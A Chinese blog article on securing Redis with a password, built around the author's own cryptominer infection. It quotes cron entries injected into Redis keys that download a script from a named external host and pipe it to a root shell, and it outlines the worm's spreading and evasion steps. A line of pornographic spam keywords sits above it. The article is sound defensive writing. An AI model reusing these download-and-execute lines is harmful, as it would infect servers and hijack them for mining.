亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

一文詳解Redis為什么一定要設(shè)置密碼原理

 更新時(shí)間:2023年03月14日 09:42:13   作者:佳慶  
這篇文章主要為大家介紹了Redis為什么一定要設(shè)置密碼原理詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪

為什么redis要設(shè)置密碼?

內(nèi)網(wǎng)環(huán)境可以不設(shè)置密碼,但是個(gè)人服務(wù)器,以及線(xiàn)上公網(wǎng)服務(wù)器就有必要設(shè)置密碼了。

昨天我查看了一下minio的redis事件通知,查看redis的key時(shí)發(fā)現(xiàn)多了幾個(gè)奇怪的key。backup1,backup2,backup3。然后我猜想應(yīng)該是挖礦病毒。

如下面所示:這樣就將定時(shí)任務(wù)和腳本注入到了我們機(jī)器當(dāng)中,就會(huì)開(kāi)始執(zhí)行 init.sh 腳本

backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n"
backup2 "\n\n\n*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"
backup3 "\n\n\n*/4 * * * * root curl -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n"
backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"

init.sh腳本內(nèi)容是什么?

en2an.top/cleanfda/in…

我們查看這個(gè)key的value能得到它會(huì)去請(qǐng)求一個(gè)地址,我們打開(kāi)看一下這個(gè)init.sh到底是什么東西。

如下圖所示是個(gè)腳本文件。

這個(gè)腳本還挺多的,關(guān)閉selinux、殺掉別人的挖礦進(jìn)程、殺掉CPU占用過(guò)高的進(jìn)程,如果是自己就跳過(guò)、修改破壞系統(tǒng)命令、自己造一個(gè)下載器downloads()函數(shù)、解鎖和加鎖定時(shí)任務(wù)、添加挖礦技術(shù)任務(wù)、設(shè)置SSH免密登陸、下載執(zhí)行礦機(jī)挖礦程序、關(guān)閉防火墻、清除日志、感染已知的免密機(jī)器、下載執(zhí)行is.sh。

is.sh腳本內(nèi)容是什么?

en2an.top/cleanfda/is…

如下圖所示,上面的init.sh會(huì)下載我們的is.sh腳本。

我們看一下這個(gè)腳本是干什么。

如下圖所示,這個(gè)腳本的內(nèi)容也挺多的。下載masscan掃描器、下載pnscan掃描器、安裝 redis 用于創(chuàng)建 redis 未授權(quán)訪(fǎng)問(wèn)的漏洞、執(zhí)行 rs.sh。

rs.sh腳本內(nèi)容是什么?

en2an.top/cleanfda/rs…

上面的連接可以查看這個(gè)腳本內(nèi)容是什么。

開(kāi)放 6379 端口、自動(dòng)化利用redis未授權(quán)寫(xiě)入定時(shí)任務(wù),利用 pnscan 掃描b段IP 6379 端口,利用 masscan 進(jìn)行掃描端口。

Redis如何設(shè)置密碼?

經(jīng)過(guò)以上分析,就知道這個(gè)病毒主要是通過(guò)你的redis注入進(jìn)去執(zhí)行挖礦腳本。如果你的redis沒(méi)有設(shè)置密碼,而且暴露在公網(wǎng)上就要小心了。

可以通過(guò)以下兩種方式對(duì)我們的redis進(jìn)行設(shè)置密碼。

方式一:修改我們的redis.conf配置文件

需要注意的是這種方式因?yàn)樾薷牧伺渲梦募?需要重新啟動(dòng)我們的redis才能生效。

找到我們的redis.conf文件。

Windows如下圖所示

我們編輯此文件,找到requirepass,放開(kāi)注釋?zhuān)O(shè)置指定的值就,重啟redis就生效了。

Linux的話(huà),因?yàn)榇蠹业陌惭b方式可能不同,我這邊是通過(guò)docker安裝的,做了映射的。這里就不給大家演示了,找到自己安裝在linux的redis目錄找到redis.conf配置文件,跟windows一樣的操作,配置完重啟就Ok了。

方式二

連接我們的redis,然后通過(guò)指令的方式設(shè)置密碼。

這種方式比較簡(jiǎn)單,而且不需要重啟就生效。

下面的指令的意思就是把密碼設(shè)置為123456,公網(wǎng)可不要設(shè)置這么簡(jiǎn)單阿。

config set requirepass 123456

我們查看一下我們的redis的密碼。

config get requirepass

這樣我們的密碼就設(shè)置成功了,退出我們的redis客戶(hù)端再次連接的時(shí)候就生效了。

總結(jié)

公網(wǎng)的redis一定要設(shè)置密碼阿,不要不設(shè)置密碼,設(shè)置密碼就一個(gè)指令,非常容易,可不要偷懶噢。

以上就是一文詳解Redis為什么一定要設(shè)置密碼原理的詳細(xì)內(nèi)容,更多關(guān)于Redis設(shè)置密碼的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

  • 淺談Redis的異步機(jī)制

    淺談Redis的異步機(jī)制

    命令操作、系統(tǒng)配置、關(guān)鍵機(jī)制、硬件配置等會(huì)影響 Redis 的性能,還要提前準(zhǔn)備好應(yīng)對(duì)異常的方案,本文主要介紹了Redis的異步機(jī)制,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2022-05-05
  • Linux上安裝Redis詳細(xì)教程

    Linux上安裝Redis詳細(xì)教程

    這篇文章主要給大家詳細(xì)介紹了在Linux上安裝Redis詳細(xì)教程,文中有詳細(xì)的代碼示例和安裝步驟,對(duì)我們學(xué)習(xí)安裝redis有一定的幫助,需要的朋友可以參考下
    2023-07-07
  • Redis key命令key的儲(chǔ)存方式

    Redis key命令key的儲(chǔ)存方式

    這篇文章主要介紹了Redis key命令key的儲(chǔ)存方式,具有很好的參考價(jià)值,希望對(duì)大家有所幫助,如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2024-04-04
  • Redis在項(xiàng)目中的使用(JedisPool方式)

    Redis在項(xiàng)目中的使用(JedisPool方式)

    項(xiàng)目操作redis是使用的RedisTemplate方式,另外還可以完全使用JedisPool和Jedis來(lái)操作redis,本文給大家介紹Redis在項(xiàng)目中的使用,JedisPool方式,感興趣的朋友跟隨小編一起看看吧
    2021-12-12
  • Redis教程(十五):C語(yǔ)言連接操作代碼實(shí)例

    Redis教程(十五):C語(yǔ)言連接操作代碼實(shí)例

    這篇文章主要介紹了Redis教程(十五):C語(yǔ)言連接操作代碼實(shí)例,本篇博客是該系列博客中的最后一篇,在這里將給出基于Redis客戶(hù)端組件訪(fǎng)問(wèn)并操作Redis服務(wù)器的代碼示例,需要的朋友可以參考下
    2015-05-05
  • 詳解Redis?鍵和字符串常用命令

    詳解Redis?鍵和字符串常用命令

    字符串是?Redis?最基本的數(shù)據(jù)結(jié)構(gòu),它將以一個(gè)鍵?和一個(gè)值?儲(chǔ)存在?Redis?內(nèi)部,本文重點(diǎn)給大家介紹Redis鍵和字符串常用命令,感興趣的朋友一起看看吧
    2022-02-02
  • 使用Redis實(shí)現(xiàn)用戶(hù)積分排行榜的教程

    使用Redis實(shí)現(xiàn)用戶(hù)積分排行榜的教程

    這篇文章主要介紹了使用Redis實(shí)現(xiàn)用戶(hù)積分排行榜的教程,包括一個(gè)用PHP腳本進(jìn)行操作的例子,需要的朋友可以參考下
    2015-04-04
  • Redis 實(shí)現(xiàn)隊(duì)列原理的實(shí)例詳解

    Redis 實(shí)現(xiàn)隊(duì)列原理的實(shí)例詳解

    這篇文章主要介紹了Redis 實(shí)現(xiàn)隊(duì)列原理的實(shí)例詳解的相關(guān)資料,希望通過(guò)本文能幫助到大家,需要的朋友可以參考下
    2017-09-09
  • 基于redis實(shí)現(xiàn)世界杯排行榜功能項(xiàng)目實(shí)戰(zhàn)

    基于redis實(shí)現(xiàn)世界杯排行榜功能項(xiàng)目實(shí)戰(zhàn)

    前段時(shí)間,做了一個(gè)世界杯競(jìng)猜積分排行榜。對(duì)世界杯64場(chǎng)球賽勝負(fù)平進(jìn)行猜測(cè),猜對(duì)+1分,錯(cuò)誤+0分,一人一場(chǎng)只能猜一次。下面通過(guò)本文給大家分享基于redis實(shí)現(xiàn)世界杯排行榜功能項(xiàng)目實(shí)戰(zhàn),感興趣的朋友一起看看吧
    2018-10-10
  • redis的2種持久化方案深入講解

    redis的2種持久化方案深入講解

    這篇文章主要給大家介紹了關(guān)于redis的2種持久化方案的相關(guān)資料,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家學(xué)習(xí)或者使用redis具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2019-05-05

最新評(píng)論